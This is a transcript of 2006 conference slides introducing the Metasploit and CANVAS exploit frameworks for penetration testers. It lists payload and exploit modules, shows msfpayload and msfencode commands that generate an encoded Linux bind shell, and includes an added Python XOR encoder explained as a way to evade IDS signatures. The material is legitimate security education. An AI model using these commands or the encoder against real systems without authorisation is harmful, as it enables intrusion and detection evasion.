DEMO! Questions? - Jingojango.net

tunisianbromidrosis, Internet and Web Applications

5 Feb 2013 (4 years and 5 months ago)

Exploit Frameworks
Metasploit and Canvas

Kurt Grutzmacher <grutz@jingojango.net>
Garrett Gee <ggee@srtek.net>

© 2006, Artistic License

BayLISA, 02/18/06

Nmap - BayLISA 02/18/06

Who we are

- Penetration testers for a large financial institution in the Bay area
- Many years combined experience in performing assessments, red teaming, exploring vulnerabilities, etc.

Why use attack tools?

Difficult to answer in one slide, but let's try:

- Best way to ensure patch application
- The bad guys don’t care about your policy
- Helps gain a deeper knowledge
- Validate protective systems or disprove vendor claims! (Lots of fun!)

Goals of Frameworks

“The goal is to provide useful information to people who perform penetration testing, IDS signature development, and exploit research. This site was created to fill the gaps in the information publicly available on various exploitation techniques and to create a useful resource for exploit developers. The tools and information on this site are provided for legal penetration testing and research purposes only.”

Source: Metasploit Framework

Attack Methodology

- Reconnaissance
  - Port map, hunt for Visio documents, hang out at the water cooler, pull user listing from yp, active directory, ldap, etc.
- Attack
  - Exploit systems for profit!
- Control
  - Maintain access without detection

Brief Agenda

- Anatomy of an Exploit (pre ’04)
- Exploit writing hurdles
- Frameworks to the rescue
- Future of Frameworks

Anatomy of an Exploit

How it was before 2004:

- Researcher finds a bug (overflow!)
- Gains control of EIP
- Writes their own shellcode or uses somebody else’s (prev exploit, library, etc)
- Develops and releases the code to bugtraq
- Sits back and rakes in the cash/props!!

Complications in Exploit Writing

Complications?

- Multiple operating system support
- Multiple Shellcodes
- Big or Little Endian?
- Delivery system may require large development
  - RPC Handlers
  - HTTP Request/Response code
  - SMB? SSH? SSL? LDAP? Yuck.

Adds Up To Fun for Researchers!

- Recreating all the delivery code for each exploit? Yeah, that’s fun.
- Writing lots and lots of loops to try offsets
- Hard to work with other researchers
  - No common base of code
  - Everybody does things their own way!
- Might need unique payload handler for each vuln you find! Yuck!

Fun for PTers/Admins

- Rush of writing exploits means low quality
- May not always exploit correctly (false sense of security)
- Could be malicious payload!
- We don’t have the time to debug some kid’s 150 line C code.

Problems with Complex Protos

- Dependent upon the API
- Usually exploits released as “patch” to specific version of client:

Payload Issues

- Most of them are hard coded and not something you want to test with
- Very difficult to use some payloads (offset placement, value changes, etc)
- Again, no standards!

Early Solutions

- Payload Generators
  - Impurity
  - Shellforge
  - MOSDEF
  - InlineEgg
  - ADMutate

Better Solutions

- Exploit Frameworks
  - CORE Impact
    http://www.coresecurity.com/products/coreimpact/index.php
  - ImmunitySec CANVAS
    http://www.immunitysec.com/products-canvas.shtml
  - Metasploit Exploit Framework
    http://www.metasploit.com/projects/Framework/

CORE Impact

We don’t have it but here’s a screenshot!

ImmunitySec CANVAS

- This we do have. Costs $995 plus yearly maintenance fee
- Written in Python
- MOSDEF and Hydrogen included
- GUI GUI GUI GUI GUI GUI
- Easy to use (if you know Python) API for developing your own exploits.

CANVAS Demo

 ------------
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

Metasploit Exploit Framework

- FREE FREE FREE FREE FREE
- Version 2 written in Perl
- Version 3 written in Ruby
- Core developers respected within the Infosec community
- Exploits are reliable and thoroughly tested
- Easy to develop and expand for own research
- Multiple payloads
  - BSD, BSDi, Solaris (SPARC & x86), IRIX, OSX, Linux, Win32
- Multiple payload encoders
- Great for research and development
- Much much much more

Tools in the Framework

- msfpescan - Process a PE file for asm combinations (jmp, pop+pop+ret, etc)
- msfelfscan - Similar but for ELFs
- msfpayload - Generate payload code
- msfencode - Encode payload from stdin or input file
- msfcli, msfconsole, msfweb - Core exploit execution programs

msfencode Types

$ ./msfencode -l

Encoder Name        Arch    Description
Alpha2              x86     Skylined's Alpha2 alphanumeric encoder ported to perl
Countdown           x86     Tiny countdown byte xor encoder
JmpCallAdditive     x86     Jmp/Call XOR Additive Feedback Decoder
None                all     Does nothing to the code
OSXPPCLongXOR       ppc     This is ghandi's PPC dword xor decoder with size tweaks by HDM
OSXPPCLongXORTag    ppc     This is based on ghandi's PPC dword xor decoder, now tag-based and smaller
Pex                 x86     Dynamically generated dword xor encoder
PexAlphaNum         x86     Skylined's alphanumeric encoder ported to perl
PexFnstenvMov       x86     Variable-length fnstenv/mov dword xor encoder
PexFnstenvSub       x86     Variable-length fnstenv/sub dword xor encoder
QuackQuack          ppc     This is optyx's nifty ppc decoder with coherency tweaks by hdm
ShikataGaNai        x86     You know what I'm saying, baby
Sparc               sparc   optyx's 48 byte XOR decoder

msfpayload Payloads

$ ls payloads/
Empty.pm                      irix_mips_execve.pm               solaris_sparc_bind.pm
bsd_ia32_bind.pm              linux_ia32_adduser.pm             solaris_sparc_findsock.pm
bsd_ia32_bind_ie.pm           linux_ia32_bind.pm                solaris_sparc_reverse.pm
bsd_ia32_bind_stg.pm          linux_ia32_bind_ie.pm             win32_adduser.pm
bsd_ia32_exec.pm              linux_ia32_bind_stg.pm            win32_bind.pm
bsd_ia32_findrecv.pm          linux_ia32_exec.pm                win32_bind_dllinject.pm
bsd_ia32_findrecv_stg.pm      linux_ia32_findrecv.pm            win32_bind_meterpreter.pm
bsd_ia32_findsock.pm          linux_ia32_findrecv_stg.pm        win32_bind_stg.pm
bsd_ia32_reverse.pm           linux_ia32_findsock.pm            win32_bind_stg_upexec.pm
bsd_ia32_reverse_ie.pm        linux_ia32_reverse.pm             win32_bind_vncinject.pm
bsd_ia32_reverse_stg.pm       linux_ia32_reverse_ie.pm          win32_downloadexec.pm
bsd_sparc_bind.pm             linux_ia32_reverse_impurity.pm    win32_exec.pm
bsd_sparc_reverse.pm          linux_ia32_reverse_stg.pm         win32_findrecv_ord_meterpreter.pm
bsdi_ia32_bind.pm             linux_ia32_reverse_udp.pm         win32_findrecv_ord_stg.pm
bsdi_ia32_bind_stg.pm         linux_ia32_reverse_xor.pm         win32_findrecv_ord_vncinject.pm
bsdi_ia32_findsock.pm         linux_sparc_bind.pm               win32_passivex.pm
bsdi_ia32_reverse.pm          linux_sparc_findsock.pm           win32_passivex_meterpreter.pm
bsdi_ia32_reverse_stg.pm      linux_sparc_reverse.pm            win32_passivex_stg.pm
cmd_generic.pm                osx_ppc_bind.pm                   win32_passivex_vncinject.pm
cmd_interact.pm               osx_ppc_bind_stg.pm               win32_reverse.pm
cmd_irix_bind.pm              osx_ppc_findrecv_peek_stg.pm      win32_reverse_dllinject.pm
cmd_localshell.pm             osx_ppc_findrecv_stg.pm           win32_reverse_meterpreter.pm
cmd_sol_bind.pm               osx_ppc_reverse.pm                win32_reverse_ord.pm
cmd_unix_reverse.pm           osx_ppc_reverse_nf_stg.pm         win32_reverse_ord_vncinject.pm
cmd_unix_reverse_bash.pm      osx_ppc_reverse_stg.pm            win32_reverse_stg.pm
cmd_unix_reverse_nss.pm       solaris_ia32_bind.pm              win32_reverse_stg_ie.pm
external                      solaris_ia32_findsock.pm          win32_reverse_stg_upexec.pm
generic_sparc_execve.pm       solaris_ia32_reverse.pm           win32_reverse_vncinject.pm

Exploits?

3com_3cdaemon_ftp_overflow.pm     ie_xp_pfv_metafile.pm             realserver_describe_linux.pm
afp_loginext.pm                   iis40_htr.pm                      rsa_iiswebagent_redirect.pm
aim_goaway.pm                     iis50_printer_overflow.pm         samba_nttrans.pm
altn_webadmin.pm                  iis50_webdav_ntdll.pm             samba_trans2open.pm
apache_chunked_win32.pm           iis_fp30reg_chunked.pm            samba_trans2open_osx.pm
arkeia_agent_access.pm            iis_nsiislog_post.pm              samba_trans2open_solsparc.pm
arkeia_type77_macos.pm            iis_source_dumper.pm              sambar6_search_results.pm
arkeia_type77_win32.pm            iis_w3who_overflow.pm             seattlelab_mail_55.pm
awstats_configdir_exec.pm         imail_imap_delete.pm              sentinel_lm7_overflow.pm
backupexec_agent.pm               imail_ldap.pm                     servu_mdtm_overflow.pm
backupexec_dump.pm                irix_lpsched_exec.pm              shoutcast_format_win32.pm
backupexec_ns.pm                  lsass_ms04_011.pm                 slimftpd_list_concat.pm
backupexec_registry.pm            lyris_attachment_mssql.pm         smb_sniffer.pm
badblue_ext_overflow.pm           mailenable_auth_header.pm         solaris_dtspcd_noir.pm
bakbone_netvault_heap.pm          mailenable_imap.pm                solaris_kcms_readfile.pm
barracuda_img_exec.pm             mailenable_imap_w3c.pm            solaris_lpd_exec.pm
blackice_pam_icq.pm               maxdb_webdbm_get_overflow.pm      solaris_lpd_unlink.pm
bluecoat_winproxy.pm              mdaemon_imap_cram_md5.pm          solaris_sadmind_exec.pm
cabrightstor_disco.pm             mercantec_softcart.pm             solaris_snmpxdmid.pm
cabrightstor_disco_servicepc.pm   mercury_imap.pm                   solaris_ttyprompt.pm
cabrightstor_sqlagent.pm          minishare_get_overflow.pm         squid_ntlm_authenticate.pm
cabrightstor_uniagent.pm          mozilla_compareto.pm              svnserve_date.pm
cacam_logsecurity_win32.pm        ms05_039_pnp.pm                   trackercam_phparg_overflow.pm
cacti_graphimage_exec.pm          msasn1_ms04_007_killbill.pm       uow_imap4_copy.pm
calicclnt_getconfig.pm            msmq_deleteobject_ms05_017.pm     uow_imap4_lsub.pm
calicserv_getconfig.pm            msrpc_dcom_ms03_026.pm            ut2004_secure_linux.pm
distcc_exec.pm                    mssql2000_preauthentication.pm    ut2004_secure_win32.pm
edirectory_imonitor.pm            mssql2000_resolution.pm           warftpd_165_pass.pm
exchange2000_xexch50.pm           netterm_netftpd_user_overflow.pm  warftpd_165_user.pm
freeftpd_user.pm                  openview_connectednodes_exec.pm   webstar_ftp_user.pm
futuresoft_tftpd.pm               openview_omniback.pm              winamp_playlist_unc.pm
globalscapeftp_user_input.pm      oracle9i_xdb_ftp.pm               windows_ssl_pct.pm
gnu_mailutils_imap4d.pm           oracle9i_xdb_ftp_pass.pm          wins_ms04_045.pm
google_proxystylesheet_exec.pm    oracle9i_xdb_http.pm              wmailserver_smtp.pm
hpux_ftpd_preauth_list.pm         php_vbulletin_template.pm         wsftp_server_503_mkd.pm
hpux_lpd_exec.pm                  php_wordpress_lastpost.pm         wzdftpd_site.pm
ia_webmail.pm                     php_xmlrpc_eval.pm                ypops_smtp.pm
icecast_header.pm                 phpbb_highlight.pm                zenworks_desktop_agent.pm
ie_objecttype.pm                  poptop_negative_read.pm

Objective: Obtain Linux shellcode to bind!

$ ./msfpayload linux_ia32_bind

       Name: Linux IA32 Bind Shell
    Version: $Revision: 1.2 $
     OS/CPU: linux/x86
Needs Admin: No
 Multistage: No
 Total Size: 84
       Keys: bind

Provided By:
    skape <miller [at] hick.org>
    vlad902 <vlad902 [at] gmail.com>

Available Options:

    Options:    Name     Default    Description
    --------    ------   -------    -----------------------------
    required    LPORT    4444       Listening port for bind shell

Advanced Options:

    Advanced (Msf::Payload::linux_ia32_bind):
    -----------------------------------------

Description:
    Listen for connection and spawn a shell

Print that shellcode!

$ ./msfpayload linux_ia32_bind P

[84 bytes of bind shell payload printed as a Perl string; omitted]

(P means in PERL format, not Print…)



Let's snazz it up some

$ ./msfpayload linux_ia32_bind R | ./msfencode -e PexAlphaNum -t perl

[*] Using Msf::Encoder::PexAlphaNum with final size of 243 bytes

[243 bytes of encoded payload printed as a Perl string; omitted]
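As an added illustration (not code from the slides or from Metasploit) of what the dword XOR encoders listed under msfencode do to a payload body, and why an IDS byte signature written against the raw payload stops matching the encoded output, here is a Python transform that picks a key avoiding a set of forbidden bytes, encodes, and decodes again. The sample bytes, the bad-character set and all function names are constructed for this example; msfencode additionally prepends a machine-code decoder stub (hence 84 bytes growing to 243 above), which this example leaves out.

```python
import random
import struct

# Constructed for this example: bytes the delivery protocol cannot carry.
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed stand-in for a raw payload (not real shellcode). The cleartext
# "/bin/sh" is the kind of string an IDS byte signature would key on; the real
# bind shell on the previous slides likewise embeds "//sh" and "/bin".
SAMPLE = b"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58/bin/sh\x00\xcd\x80"


def pad_to_dword(data: bytes, filler: int = 0x90) -> bytes:
    """Pad to a multiple of 4 so the data can be handled as little-endian dwords."""
    return data + bytes([filler]) * (-len(data) % 4)


def xor_dwords(data: bytes, key: int) -> bytes:
    """XOR every little-endian dword with key; applying it twice restores the input."""
    if len(data) % 4:
        raise ValueError("data must be dword aligned")
    n = len(data) // 4
    words = struct.unpack("<%dI" % n, data)
    return struct.pack("<%dI" % n, *(w ^ key for w in words))


def pick_key(data: bytes, bad: bytes = BAD_CHARS, seed: int = 1,
             tries: int = 100000) -> int:
    """Search for a non-zero 32-bit key such that neither the key (it gets
    embedded in the decoder stub) nor the encoded output contains a bad byte."""
    rng = random.Random(seed)  # seeded so the result is reproducible
    for _ in range(tries):
        key = rng.getrandbits(32)
        if key == 0 or any(b in bad for b in struct.pack("<I", key)):
            continue
        if not any(b in bad for b in xor_dwords(data, key)):
            return key
    raise RuntimeError("no usable key found; try another encoder")


def encode(payload: bytes, seed: int = 1) -> tuple:
    """Return (key, encoded body). msfencode would also prepend a machine-code
    decoder stub; that stub, not the now random-looking body, is what a
    signature can still match on."""
    padded = pad_to_dword(payload)
    key = pick_key(padded, seed=seed)
    return key, xor_dwords(padded, key)


def decode(encoded: bytes, key: int, original_len: int) -> bytes:
    """Reverse the transform, as the decoder stub does on the target at run time."""
    return xor_dwords(encoded, key)[:original_len]
```

Because the key is chosen per run, two encodings of the same payload share no bytes in the body; signatures for encoded payloads therefore target the decoder stub, which is why msfencode ships several stubs.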



Learn By Example: LSASS

- A routine scan found a system vulnerable to MS04-011 (don’t laugh, it happens)
- You track down the system and the owner claims it’s not exploitable because they’ve done “something” to it.
- Sure scanners lie sometimes, but 99% of the time this one is right. (percentages are estimates and not proven facts)
- Management approves your ability to secure the network at “all costs”

Achtung!

- Exploiting systems you do not have the authority to can be career limiting events!
- Always get approval from somebody higher in the food chain than you.
- The Internet is not your own private lab.
- VMware Server is now free! http://www.vmware.com/products/server/

Lassoing the LSASS

With all your permissions in hand, attack!

Metasploit in Real Life

DEMO!

Questions?

Thanks!

Thanks to the authors of Metasploit, the researchers, the kids writing exploits, the kids finding exploits, and Microsoft for keeping us in business.

http://grutz.jingojango.net/presentations/